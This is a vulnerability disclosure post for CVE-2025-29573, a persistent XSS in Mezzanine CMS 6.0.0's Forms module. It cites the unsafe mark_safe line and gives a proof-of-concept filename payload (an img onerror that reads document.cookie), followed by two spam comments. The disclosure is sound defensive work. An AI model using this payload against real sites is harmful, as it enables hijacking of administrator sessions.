top of page

CVE-2025-29573: Persistent XSS in Mezzanine CMS 6.0.0 via Malicious Filename

Atualizado: 5 de mai. de 2025



Status: CVE published

Date of discovery: March 5, 2025

Researcher: Paulo Cesar (PC) – Squad AppSec

Last update: No response received from project maintainers


Description

A Persistent Cross-Site Scripting (XSS) vulnerability has been identified in Mezzanine CMS v6.0.0, specifically in the “View Entries” feature of the Forms module.


The issue occurs when an administrator views form submission results that include a File Upload field. The name of the uploaded file is not properly sanitized, allowing an attacker to include a malicious JavaScript payload in the filename. This code executes in the administrator’s browser whenever the file is viewed.


The root cause is the unsafe rendering of the filename through direct HTML interpolation without proper escaping.



Affected Product

  • Component: Mezzanine CMS (GitHub)

  • Version: 6.0.0

  • Affected module: Forms

  • Vulnerable route: /admin/forms/entries/ (admin interface for viewing form entries)


Vulnerable Code

The vulnerability is related to the following line in mezzanine/forms/forms.py, line 435:

field_value = mark_safe('<a href="%s">%s</a>' % parts)



The mark_safe function in Django instructs the template engine not to escape the content, assuming it is safe. When combined with untrusted input, such as filenames submitted by users, this function can lead to malicious code execution on the client side.


Proof of Concept (PoC)

  1. The admin creates a form in Mezzanine CMS containing a File Upload field.



2. The attacker fills out the form and uploads a file with a malicious filename, such as:


<img src='x' onerror='alert(document.cookie);'>




3. The administrator accesses the form entries view page in the Mezzanine admin panel. (Note that the malicious JavaScript code is executed when the file is displayed.)



Impact

This vulnerability is considered high severity, as it affects the administrative interface of Mezzanine CMS — an area with elevated privileges and access to sensitive data.


By exploiting this flaw, an attacker can execute arbitrary JavaScript in the browser of authenticated admins, leading to:

  • Session hijacking (e.g., stealing authentication cookies or CSRF tokens)

  • Privilege escalation, if internal APIs are abused

  • UI manipulation, such as injecting rogue forms or phishing links

  • Unauthorized actions, such as deleting or altering content via session riding


Since this is a persistent XSS, the payload remains stored in the system and is executed every time an admin views the affected entry, increasing both exposure time and risk.

In multi-admin environments, this could propagate across accounts, making detection difficult and potentially compromising the entire application.


Mitigation & Recommendations

  • Apply a patch if and when it becomes available from the project maintainers.

  • Always sanitize file names and other user inputs before rendering them as HTML.

  • Avoid using mark_safe on untrusted content unless properly escaped beforehand.


CVE Details

  • ID: CVE-2025-29573

  • Type: Persistent Cross-Site Scripting (XSS)

  • Severity: High

  • Public reference: This article

  • Reported by: Paulo Cesar – Squad AppSec

  • Status: Reserved (not yet published on cve.org)



Contact

For questions, coordinated disclosure, or partnerships: 

 
 
 

2 comentários


Online tool to parse and displ
09 de fev.

Yikes, persistent XSS in Mezzanine CMS via filename? That sounds nasty! Makes you think about all the potential vulnerabilities hiding in unexpected places. Speaking of handling files carefully, if you need a quick and easy HTML file viewer, there are some great online tools available.

Curtir

ab a
ab a
05 de jul. de 2025

When you need to Visualize Code for HTML, CSS, and sometimes even JavaScript, an online HTML viewer and editor provides an immediate solution. These tools are perfect for students learning web development, as they offer a simple environment to experiment with code and see the results instantly. They're also useful for experienced developers who need to quickly test a small piece of code or inspect the output of generated HTML without setting up a local server. The live preview feature is particularly beneficial for rapid iteration and understanding.

Curtir
bottom of page